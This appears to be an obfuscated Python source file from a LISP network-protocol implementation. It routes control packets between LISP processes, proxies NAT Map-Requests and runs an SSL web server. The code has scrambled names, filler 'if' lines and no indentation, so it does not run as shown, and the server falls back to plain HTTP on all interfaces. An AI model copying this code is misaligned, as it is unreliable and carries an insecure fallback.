if 34 - 34: I11i / I11i % IiII . OoOoOO00 / Oo0Ooo
if 99 - 99: ooOoO0o * I1IiiI - ooOoO0o % Ii1I
if 40 - 40: OOooOOo / IiII / iIii1I11I1II1 + Ii1I
if 59 - 59: I11i * OoooooooOO + OOooOOo . iIii1I11I1II1 / i1IIi
def O0Oo0O00o0oo0OO ( addr_str , port , nonce ) :
if ( addr_str != None ) :
for OooO00 in list ( lisp . lisp_info_sources_by_address . values ( ) ) :
o0O00OoOOo = OooO00 . address . print_address_no_iid ( )
if ( o0O00OoOOo == addr_str and OooO00 . port == port ) :
return ( OooO00 )
if 9 - 9: o0oOOo0O0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 28 - 28: OoooooooOO % oO0o + I1ii11iIi11i + O0 . I1Ii111
return ( None )
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
if ( nonce != None ) :
if ( nonce not in lisp . lisp_info_sources_by_nonce ) : return ( None )
return ( lisp . lisp_info_sources_by_nonce [ nonce ] )
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
return ( None )
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if 21 - 21: iII111i
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
if 8 - 8: I1Ii111 + OoO0O00
if 9 - 9: OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
def oOiIi ( lisp_sockets , info_source , packet ) :
if 65 - 65: II111iiii + i1IIi * i11iIiiIii
if 38 - 38: iIii1I11I1II1 + OoooooooOO * I1IiiI % OoOoOO00 % I11i - IiII
if 56 - 56: OoooooooOO * Oo0Ooo * I11i + ooOoO0o
if 54 - 54: OoOoOO00 * i11iIiiIii . OoooooooOO - iIii1I11I1II1
I1OO0o = lisp . lisp_ecm ( 0 )
packet = I1OO0o . decode ( packet )
if ( packet == None ) :
lisp . lprint ( "Could not decode ECM packet" )
return ( True )
if 99 - 99: II111iiii - I1Ii111 + iII111i * IiII / I1Ii111
if 41 - 41: O0 . I11i
oO0ooOOO = lisp . lisp_control_header ( )
if ( oO0ooOOO . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return ( True )
if 95 - 95: O0
if ( oO0ooOOO . type != lisp . LISP_MAP_REQUEST ) :
lisp . lprint ( "Received ECM without Map-Request inside" )
return ( True )
if 75 - 75: IiII + OoO0O00 * I11i - OoOoOO00
if 52 - 52: OOooOOo * oO0o + I11i * I11i % i1IIi % I11i
if 96 - 96: o0oOOo0O0Ooo * oO0o - OOooOOo * o0oOOo0O0Ooo * i1IIi
if 8 - 8: ooOoO0o - Oo0Ooo + iIii1I11I1II1 + i1IIi * Ii1I - iIii1I11I1II1
if 30 - 30: I11i / I1ii11iIi11i
iI1iIIIIIiIi1 = lisp . lisp_map_request ( )
packet = iI1iIIIIIiIi1 . decode ( packet , None , 0 )
iIi = iI1iIIIIIiIi1 . nonce
oOoooOo0o = info_source . address . print_address_no_iid ( )
if 44 - 44: Oo0Ooo . Oo0Ooo + OoooooooOO * i11iIiiIii / I11i + I1Ii111
if 17 - 17: OOooOOo + II111iiii
if 43 - 43: I11i % Ii1I / o0oOOo0O0Ooo * I1Ii111
if 85 - 85: iIii1I11I1II1 . OoooooooOO . o0oOOo0O0Ooo
iI1iIIIIIiIi1 . print_map_request ( )
if 77 - 77: I1IiiI % ooOoO0o
lisp . lprint ( "Process {} from info-source {}, port {}, nonce 0x{}" . format ( lisp . bold ( "nat-proxy Map-Request" , False ) ,
# II111iiii + Ii1I + OoooooooOO / i1IIi - Ii1I
lisp . red ( oOoooOo0o , False ) , info_source . port ,
lisp . lisp_hex_string ( iIi ) ) )
if 87 - 87: iII111i / I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 65 - 65: II111iiii / Oo0Ooo
if 42 - 42: i11iIiiIii . O0
info_source . cache_nonce_for_info_source ( iIi )
if 75 - 75: I1Ii111 + iIii1I11I1II1
if 19 - 19: I1IiiI + i11iIiiIii . IiII - I11i / Ii1I + o0oOOo0O0Ooo
if 38 - 38: Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1 % I1ii11iIi11i
if 92 - 92: I11i / O0 * I1IiiI - I11i
if 99 - 99: i11iIiiIii % OoooooooOO
info_source . no_timeout = iI1iIIIIIiIi1 . subscribe_bit
if 56 - 56: IiII * I1Ii111
if 98 - 98: I11i + O0 * I1Ii111 + i11iIiiIii - OOooOOo - iIii1I11I1II1
if 5 - 5: OOooOOo % Oo0Ooo % IiII % ooOoO0o
if 17 - 17: Ii1I + II111iiii + OoooooooOO / OOooOOo / IiII
if 80 - 80: o0oOOo0O0Ooo % i1IIi / I11i
if 56 - 56: i1IIi . i11iIiiIii
for Ii1Ii1IiIIIi1 in iI1iIIIIIiIi1 . itr_rlocs :
if ( Ii1Ii1IiIIIi1 . is_local ( ) ) : return ( False )
if 55 - 55: oO0o + O0 / iII111i % ooOoO0o / OoooooooOO
if 98 - 98: Ii1I * iIii1I11I1II1 % Oo0Ooo % OOooOOo
if 88 - 88: iII111i - II111iiii / iII111i - Ii1I
if 16 - 16: Oo0Ooo % I1Ii111
if 10 - 10: IiII / OoooooooOO
IiiiIIiii = lisp . lisp_myrlocs [ 0 ]
iI1iIIIIIiIi1 . itr_rloc_count = 0
iI1iIIIIIiIi1 . itr_rlocs = [ ]
iI1iIIIIIiIi1 . itr_rlocs . append ( IiiiIIiii )
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
packet = iI1iIIIIIiIi1 . encode ( None , 0 )
iI1iIIIIIiIi1 . print_map_request ( )
if 25 - 25: iIii1I11I1II1
o0o0O0oOOOooo = iI1iIIIIIiIi1 . target_eid
if ( o0o0O0oOOOooo . is_ipv6 ( ) ) :
Ii1iiI1i1 = lisp . lisp_myrlocs [ 1 ]
if ( Ii1iiI1i1 != None ) : IiiiIIiii = Ii1iiI1i1
if 3 - 3: OOooOOo . IiII / Oo0Ooo
if 89 - 89: OoooooooOO . iIii1I11I1II1 . Oo0Ooo * iIii1I11I1II1 - I1Ii111
if 92 - 92: OoooooooOO - I1ii11iIi11i - OoooooooOO % I1IiiI % I1IiiI % iIii1I11I1II1
if 92 - 92: iII111i * O0 % I1Ii111 . iIii1I11I1II1
if 66 - 66: I11i + Ii1I
i1ii1iIi = lisp . lisp_is_running ( "lisp-ms" )
lisp . lisp_send_ecm ( lisp_sockets , packet , o0o0O0oOOOooo , lisp . LISP_CTRL_PORT ,
o0o0O0oOOOooo , IiiiIIiii , to_ms = i1ii1iIi , ddt = False )
return ( True )
if 43 - 43: Ii1I + iII111i + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 54 - 54: I1ii11iIi11i + I1ii11iIi11i + I11i % i1IIi % i11iIiiIii
if 100 - 100: I1ii11iIi11i
if 96 - 96: I1IiiI . IiII * II111iiii % IiII . I1Ii111 * i1IIi
if 83 - 83: iIii1I11I1II1
if 97 - 97: i11iIiiIii + Oo0Ooo * OOooOOo % iII111i . IiII
if 4 - 4: O0 . iII111i - iIii1I11I1II1
if 19 - 19: OOooOOo % OoO0O00 / Ii1I + II111iiii % OoooooooOO
if 89 - 89: Ii1I
def o00O00O0Oo0 ( lisp_sockets , info_source , packet , mr_or_mn ) :
oOoooOo0o = info_source . address . print_address_no_iid ( )
oo00O00oO = info_source . port
iIi = info_source . nonce
if 53 - 53: i1IIi . i1IIi - I11i / iII111i - OoOoOO00 % I1IiiI
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp . bold ( "nat-proxy Map-{}" . format ( mr_or_mn ) , False )
if 65 - 65: iII111i . OoooooooOO - O0 . iII111i - i11iIiiIii
lisp . lprint ( "Forward {} to info-source {}, port {}, nonce 0x{}" . format ( mr_or_mn , lisp . red ( oOoooOo0o , False ) , oo00O00oO ,
# O0 - I1ii11iIi11i
lisp . lisp_hex_string ( iIi ) ) )
if 76 - 76: oO0o - i11iIiiIii
if 27 - 27: I1ii11iIi11i - i11iIiiIii % I1Ii111 / Oo0Ooo . Oo0Ooo / OoooooooOO
if 76 - 76: I11i * OoO0O00 . iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
O0o0O0O0O = lisp . lisp_convert_4to6 ( oOoooOo0o )
lisp . lisp_send ( lisp_sockets , O0o0O0O0O , oo00O00oO , packet )
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if 79 - 79: O0
if 32 - 32: II111iiii . O0 + Ii1I / OoOoOO00 / IiII / OOooOOo
if 15 - 15: I1ii11iIi11i
if 4 - 4: IiII + iIii1I11I1II1 * iII111i + Oo0Ooo * o0oOOo0O0Ooo % II111iiii
def OO0o0o0oo ( lisp_sockets , source , sport , packet ) :
global Ooo
if 40 - 40: Oo0Ooo
oO0ooOOO = lisp . lisp_control_header ( )
if ( oO0ooOOO . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return
if 47 - 47: OoOoOO00
if 65 - 65: O0 + I1Ii111 % Ii1I * I1IiiI / ooOoO0o / OoOoOO00
if 71 - 71: i11iIiiIii / OoOoOO00 . oO0o
if 33 - 33: oO0o
if 39 - 39: OoO0O00 + O0 + ooOoO0o * II111iiii % O0 - O0
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
if 39 - 39: Ii1I
if 60 - 60: OOooOOo
if ( oO0ooOOO . type == lisp . LISP_NAT_INFO ) :
if ( oO0ooOOO . info_reply == False ) :
lisp . lisp_process_info_request ( lisp_sockets , packet , source , sport ,
lisp . lisp_ms_rtr_list )
if 62 - 62: I1Ii111 * I11i
return
if 74 - 74: OoOoOO00 . iIii1I11I1II1
if 87 - 87: ooOoO0o
IIo0oo0OO = packet
packet = lisp . lisp_packet_ipc ( packet , source , sport )
if 17 - 17: ooOoO0o + I1ii11iIi11i * i11iIiiIii
if 82 - 82: IiII
if 51 - 51: oO0o % OoO0O00 + o0oOOo0O0Ooo + Ii1I - OoooooooOO . OoO0O00
if 18 - 18: Oo0Ooo - OOooOOo * II111iiii + oO0o
if ( oO0ooOOO . type in ( lisp . LISP_MAP_REGISTER , lisp . LISP_MAP_NOTIFY_ACK ) ) :
lisp . lisp_ipc ( packet , Ooo , "lisp-ms" )
return
if 93 - 93: iII111i * oO0o . OoO0O00 - Ii1I + O0 * OoO0O00
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
if ( oO0ooOOO . type == lisp . LISP_MAP_REPLY ) :
ii11Ii1IiiI1 = lisp . lisp_map_reply ( )
ii11Ii1IiiI1 . decode ( IIo0oo0OO )
if 83 - 83: ooOoO0o + i1IIi * OoooooooOO * oO0o
OooO00 = O0Oo0O00o0oo0OO ( None , 0 , ii11Ii1IiiI1 . nonce )
if ( OooO00 ) :
o00O00O0Oo0 ( lisp_sockets , OooO00 , IIo0oo0OO , True )
else :
iIIi1Ii1III = "/tmp/lisp-lig"
if ( os . path . exists ( iIIi1Ii1III ) ) :
lisp . lisp_ipc ( packet , Ooo , iIIi1Ii1III )
else :
lisp . lisp_ipc ( packet , Ooo , "lisp-itr" )
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
return
if 21 - 21: OoO0O00
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
if 79 - 79: II111iiii - oO0o * I1ii11iIi11i - OoOoOO00 . I1ii11iIi11i
if 11 - 11: O0 * OoOoOO00
if ( oO0ooOOO . type == lisp . LISP_MAP_NOTIFY ) :
IIii1i = lisp . lisp_map_notify ( lisp_sockets )
IIii1i . decode ( IIo0oo0OO )
if 69 - 69: I1Ii111 / OoooooooOO % i11iIiiIii
OooO00 = O0Oo0O00o0oo0OO ( None , 0 , IIii1i . nonce )
if ( OooO00 ) :
o00O00O0Oo0 ( lisp_sockets , OooO00 , IIo0oo0OO ,
False )
else :
iIIi1Ii1III = "/tmp/lisp-lig"
if ( os . path . exists ( iIIi1Ii1III ) ) :
lisp . lisp_ipc ( packet , Ooo , iIIi1Ii1III )
else :
iIii11iI1II = "lisp-rtr" if lisp . lisp_is_running ( "lisp-rtr" ) else "lisp-etr"
if 18 - 18: i11iIiiIii - ooOoO0o * oO0o + o0oOOo0O0Ooo
lisp . lisp_ipc ( packet , Ooo , iIii11iI1II )
if 16 - 16: OoooooooOO * i11iIiiIii . OoooooooOO - iIii1I11I1II1 * i1IIi
if 33 - 33: I1Ii111 % II111iiii
return
if 49 - 49: I1ii11iIi11i + I11i / o0oOOo0O0Ooo + OoooooooOO + OOooOOo / IiII
if 29 - 29: Ii1I - Ii1I / ooOoO0o
if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
if 18 - 18: Oo0Ooo % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
if ( oO0ooOOO . type == lisp . LISP_MAP_REFERRAL ) :
Ooo000O00 = "/tmp/lisp-rig"
if ( os . path . exists ( Ooo000O00 ) ) :
lisp . lisp_ipc ( packet , Ooo , Ooo000O00 )
else :
lisp . lisp_ipc ( packet , Ooo , "lisp-mr" )
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
return
if 86 - 86: IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - IiII - ooOoO0o
if 92 - 92: OoO0O00 * IiII
if 92 - 92: oO0o
if 7 - 7: iII111i
if ( oO0ooOOO . type == lisp . LISP_MAP_REQUEST ) :
iIii11iI1II = "lisp-itr" if ( oO0ooOOO . is_smr ( ) ) else "lisp-etr"
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if ( oO0ooOOO . rloc_probe ) : return
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
lisp . lisp_ipc ( packet , Ooo , iIii11iI1II )
return
if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
if 98 - 98: Ii1I - II111iiii / I1IiiI . oO0o * IiII . I11i
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 6 - 6: oO0o . I11i
if ( oO0ooOOO . type == lisp . LISP_ECM ) :
OooO00 = O0Oo0O00o0oo0OO ( source , sport , None )
if ( OooO00 ) :
if ( oOiIi ( lisp_sockets , OooO00 ,
IIo0oo0OO ) ) : return
if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
if 50 - 50: oO0o % i1IIi * O0
iIii11iI1II = "lisp-mr"
if ( oO0ooOOO . is_to_etr ( ) ) :
iIii11iI1II = "lisp-etr"
elif ( oO0ooOOO . is_to_ms ( ) ) :
iIii11iI1II = "lisp-ms"
elif ( oO0ooOOO . is_ddt ( ) ) :
if ( lisp . lisp_is_running ( "lisp-ddt" ) ) :
iIii11iI1II = "lisp-ddt"
elif ( lisp . lisp_is_running ( "lisp-ms" ) ) :
iIii11iI1II = "lisp-ms"
if 4 - 4: iIii1I11I1II1 . i1IIi
elif ( lisp . lisp_is_running ( "lisp-mr" ) == False ) :
iIii11iI1II = "lisp-etr"
if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
lisp . lisp_ipc ( packet , Ooo , iIii11iI1II )
if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
return
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
if 59 - 59: iIii1I11I1II1 / I1ii11iIi11i % ooOoO0o
if 84 - 84: iIii1I11I1II1 / I1IiiI . OoOoOO00 % I11i
if 99 - 99: Oo0Ooo + i11iIiiIii
if 36 - 36: Ii1I * I1Ii111 * iIii1I11I1II1 - I11i % i11iIiiIii
if 98 - 98: iIii1I11I1II1 - i1IIi + ooOoO0o % I11i + ooOoO0o / oO0o
if 97 - 97: IiII % ooOoO0o + II111iiii - IiII % OoO0O00 + ooOoO0o
if 31 - 31: o0oOOo0O0Ooo
if 35 - 35: OoOoOO00 + Ii1I * ooOoO0o / OoOoOO00
if 69 - 69: ooOoO0o . OOooOOo - I1IiiI
if 29 - 29: i11iIiiIii . I1ii11iIi11i / I1IiiI . OOooOOo + i11iIiiIii
if 26 - 26: IiII / Ii1I - OoooooooOO
class iiIiiII1II1ii ( bottle . ServerAdapter ) :
def run ( self , hand ) :
i1iI1iiI = "./lisp-cert.pem"
if 31 - 31: I1ii11iIi11i
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
if 96 - 96: oO0o % i1IIi / o0oOOo0O0Ooo
if 13 - 13: II111iiii - Oo0Ooo % i11iIiiIii + iII111i
if ( os . path . exists ( i1iI1iiI ) == False ) :
os . system ( "cp ./lisp-cert.pem.default {}" . format ( i1iI1iiI ) )
lisp . lprint ( ( "{} does not exist, creating a copy from lisp-" + "cert.pem.default" ) . format ( i1iI1iiI ) )
if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
if 75 - 75: O0 % iIii1I11I1II1 / OoOoOO00 % OOooOOo / IiII
iiI1iiIiiiI1I = wsgi_server ( ( self . host , self . port ) , hand )
iiI1iiIiiiI1I . ssl_adapter = ssl_adaptor ( i1iI1iiI , i1iI1iiI , None )
try :
iiI1iiIiiiI1I . start ( )
finally :
iiI1iiIiiiI1I . stop ( )
if 6 - 6: OoO0O00
if 99 - 99: o0oOOo0O0Ooo * OOooOOo % oO0o * oO0o + OoooooooOO
if 82 - 82: I11i / OoOoOO00 - OOooOOo / ooOoO0o
if 50 - 50: OOooOOo + OoO0O00 . i11iIiiIii + I1ii11iIi11i + i11iIiiIii
if 31 - 31: oO0o * I1Ii111 . OoOoOO00 * I11i
if 28 - 28: IiII + I1IiiI - Oo0Ooo % OOooOOo . I11i + I1IiiI
if 72 - 72: Ii1I / Oo0Ooo / oO0o * OoOoOO00 + OOooOOo
if 58 - 58: o0oOOo0O0Ooo % I1IiiI . I1IiiI * OoO0O00 - IiII . OoooooooOO
if 10 - 10: I1Ii111
if 48 - 48: iII111i * i1IIi % OoooooooOO * Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
if 55 - 55: OoooooooOO
if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
if 38 - 38: O0
def ooO ( bottle_port ) :
lisp . lisp_set_exception ( )
if 34 - 34: I1Ii111 * II111iiii
if 71 - 71: IiII
if 97 - 97: I1ii11iIi11i
if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if ( bottle_port < 0 ) :
bottle . run ( host = "0.0.0.0" , port = - bottle_port )
return
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
if 28 - 28: i11iIiiIii
bottle . server_names [ "lisp-ssl-server" ] = iiIiiII1II1ii
if 51 - 51: I1IiiI + ooOoO0o * O0 . Ii1I
if 82 - 82: OOooOOo * I1ii11iIi11i % Ii1I . OOooOOo
if 43 - 43: OoO0O00 . ooOoO0o * Oo0Ooo
if 20 - 20: i1IIi . i1IIi - I11i
try :
bottle . run ( host = "0.0.0.0" , port = bottle_port , server = "lisp-ssl-server" ,
fast = True )
except :
lisp . lprint ( "Could not startup lisp-ssl-server, running insecurely" )
bottle . run ( host = "0.0.0.0" , port = bottle_port )
if 89 - 89: ooOoO0o - I11i . O0 % OoooooooOO . i11iIiiIii
return
if 35 - 35: II111iiii / OoOoOO00 - O0 . II111iiii
if 55 - 55: Oo0Ooo % i1IIi * I11i
if 95 - 95: OOooOOo / II111iiii - o0oOOo0O0Ooo % I1Ii111 . I11i
if 63 - 63: iIii1I11I1II1 / ooOoO0o
if 24 - 24: Oo0Ooo / iIii1I11I1II1 % OOooOOo * OoOoOO00 - iIii1I11I1II1
if 50 - 50: II111iiii
if 39 - 39: II111iiii . OoOoOO00 - Oo0Ooo * i1IIi . OoooooooOO
if 44 - 44: I1IiiI
def oOO0O0O0OO00oo ( ) :
lisp . lisp_set_exception ( )
if 39 - 39: IiII % OoOoOO00 * I1ii11iIi11i - OoooooooOO - Oo0Ooo
return
if 75 - 75: i11iIiiIii . ooOoO0o % i1IIi . I1IiiI - oO0o + Oo0Ooo
if 66 - 66: oO0o % I1ii11iIi11i . II111iiii / OoOoOO00 / OoO0O00
if 47 - 47: iII111i + O0 / II111iiii * I1IiiI - OoooooooOO . Ii1I
if 28 - 28: oO0o . oO0o . iIii1I11I1II1 . OOooOOo . I1ii11iIi11i * i11iIiiIii
if 72 - 72: I11i
if 26 - 26: IiII % Oo0Ooo
if 72 - 72: O0 + o0oOOo0O0Ooo + I1IiiI / Oo0Ooo
if 83 - 83: IiII - I1IiiI . Ii1I
if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
def IiI1I1IIIi1i ( lisp_socket ) :
lisp . lisp_set_exception ( )
i11i1iiiII = { "lisp-itr" : False , "lisp-etr" : False , "lisp-rtr" : False ,
"lisp-mr" : False , "lisp-ms" : False , "lisp-ddt" : False }
if 73 - 73: O0 * I1Ii111 . i1IIi
while ( True ) :
time . sleep ( 1 )
OO00OoOO = i11i1iiiII
i11i1iiiII = { }
if 45 - 45: II111iiii * i1IIi
for iIii11iI1II in OO00OoOO :
i11i1iiiII [ iIii11iI1II ] = lisp . lisp_is_running ( iIii11iI1II )
if ( OO00OoOO [ iIii11iI1II ] == i11i1iiiII [ iIii11iI1II ] ) : continue
if 25 - 25: OoOoOO00 + iIii1I11I1II1 % I11i / Oo0Ooo * Oo0Ooo
lisp . lprint ( "*** Process '{}' has {} ***" . format ( iIii11iI1II ,
"come up" if i11i1iiiII [ iIii11iI1II ] else "gone down" ) )
if 51 - 51: oO0o - OoO0O00 + iII111i - o0oOOo0O0Ooo . OoO0O00 % I1ii11iIi11i
if 14 - 14: I1IiiI / O0
if 43 - 43: oO0o - IiII % i11iIiiIii * II111iiii . I1Ii111 - I11i
if 13 - 13: OoO0O00
if ( i11i1iiiII [ iIii11iI1II ] == True ) :
lisp . lisp_ipc_lock . acquire ( )
lispconfig . lisp_send_commands ( lisp_socket , iIii11iI1II )
lisp . lisp_ipc_lock . release ( )
if 70 - 70: IiII . I1Ii111 * OoO0O00 + I11i - IiII . IiII
if 60 - 60: i11iIiiIii * Oo0Ooo % OoO0O00 + OoO0O00
if 84 - 84: iIii1I11I1II1 + OoooooooOO
return
if 77 - 77: O0 * I1ii11iIi11i * oO0o + OoO0O00 + I1ii11iIi11i - I1Ii111
if 10 - 10: I1ii11iIi11i + IiII
if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
if 62 - 62: II111iiii
if 12 - 12: IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
if 80 - 80: iII111i
def iI1I1ii11IIi1 ( ) :
lisp . lisp_set_exception ( )
OOo = 60
if 80 - 80: o0oOOo0O0Ooo / oO0o / Ii1I - I1IiiI % I1Ii111
while ( True ) :
time . sleep ( OOo )
if 44 - 44: I1IiiI % OOooOOo * i11iIiiIii * i11iIiiIii - Oo0Ooo . I1Ii111
o00 = [ ]
i111iiIiiIiI = lisp . lisp_get_timestamp ( )
if 59 - 59: OOooOOo + I1IiiI / II111iiii / OoOoOO00
if 80 - 80: OoOoOO00 + iIii1I11I1II1 . IiII
if 76 - 76: I1IiiI * OOooOOo
if 12 - 12: iIii1I11I1II1 / I11i % Ii1I
for iI1i in lisp . lisp_info_sources_by_address :
OooO00 = lisp . lisp_info_sources_by_address [ iI1i ]
if ( OooO00 . no_timeout ) : continue
if ( OooO00 . uptime + OOo < i111iiIiiIiI ) : continue
if 49 - 49: OoO0O00 + II111iiii / IiII - O0 % Ii1I
o00 . append ( iI1i )
if 27 - 27: OoO0O00 + Oo0Ooo
iIi = OooO00 . nonce
if ( iIi == None ) : continue
if ( iIi in lisp . lisp_info_sources_by_nonce ) :
lisp . lisp_info_sources_by_nonce . pop ( iIi )
if 92 - 92: I1IiiI % iII111i
if 31 - 31: OoooooooOO - oO0o / I1Ii111
if 62 - 62: i11iIiiIii - I11i
if 81 - 81: I11i
if 92 - 92: OOooOOo - Oo0Ooo - OoooooooOO / IiII - i1IIi
if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
for iI1i in o00 :
lisp . lisp_info_sources_by_address . pop ( iI1i )
if 31 - 31: i1IIi % II111iiii
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
return
if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
if 48 - 48: ooOoO0o . I1ii11iIi11i
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
if 34 - 34: I1IiiI
def o0OoOo0O00 ( lisp_ipc_control_socket , lisp_sockets ) :
lisp . lisp_set_exception ( )
while ( True ) :
try : iI1i1iI1iI = lisp_ipc_control_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
iiiI11 = iI1i1iI1iI [ 0 ] . split ( "@" )
oOOo0 = iI1i1iI1iI [ 1 ]
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
III1iII1I1ii = iiiI11 [ 0 ]
O0o0O0O0O = iiiI11 [ 1 ]
oo00O00oO = int ( iiiI11 [ 2 ] )
OOoOoO = iiiI11 [ 3 : : ]
if 72 - 72: OoOoOO00 / I1Ii111 * IiII % iIii1I11I1II1
if 53 - 53: OoO0O00 . O0 . I1IiiI * OOooOOo / o0oOOo0O0Ooo
if 34 - 34: OoOoOO00
if 16 - 16: i1IIi - I1Ii111 - II111iiii
if ( len ( OOoOoO ) > 1 ) :
OOoOoO = lisp . lisp_bit_stuff ( OOoOoO )
else :
OOoOoO = OOoOoO [ 0 ]
if 83 - 83: I1IiiI - OoO0O00 - o0oOOo0O0Ooo / O0 - I11i . II111iiii
if 27 - 27: Ii1I
if ( III1iII1I1ii != "control-packet" ) :
lisp . lprint ( ( "lisp_core_control_packet_process() received" + "unexpected control-packet, message ignored" ) )
if 59 - 59: Ii1I / II111iiii - IiII % OoOoOO00 % OoooooooOO
continue
if 79 - 79: iII111i . OoooooooOO . I1IiiI * O0 * OoO0O00 - OOooOOo
if 33 - 33: I1ii11iIi11i . Oo0Ooo + I1IiiI + o0oOOo0O0Ooo
lisp . lprint ( ( "{} {} bytes from {}, dest/port: {}/{}, control-" + "packet: {}" ) . format ( lisp . bold ( "Receive" , False ) , len ( OOoOoO ) ,
# iII111i * I1Ii111 * I11i * iII111i
oOOo0 , O0o0O0O0O , oo00O00oO , lisp . lisp_format_packet ( OOoOoO ) ) )
if 57 - 57: OOooOOo % OoO0O00 - I1IiiI
if 3 - 3: OOooOOo + i1IIi % I1ii11iIi11i
if 100 - 100: OoooooooOO + i11iIiiIii % o0oOOo0O0Ooo + I1IiiI . Oo0Ooo . II111iiii
if 93 - 93: II111iiii . i11iIiiIii + II111iiii % oO0o
if 98 - 98: I1Ii111 * oO0o * OoOoOO00 + Ii1I * iII111i
if 4 - 4: IiII
oO0ooOOO = lisp . lisp_control_header ( )
oO0ooOOO . decode ( OOoOoO )
if ( oO0ooOOO . type == lisp . LISP_MAP_REPLY ) :
ii11Ii1IiiI1 = lisp . lisp_map_reply ( )
ii11Ii1IiiI1 . decode ( OOoOoO )
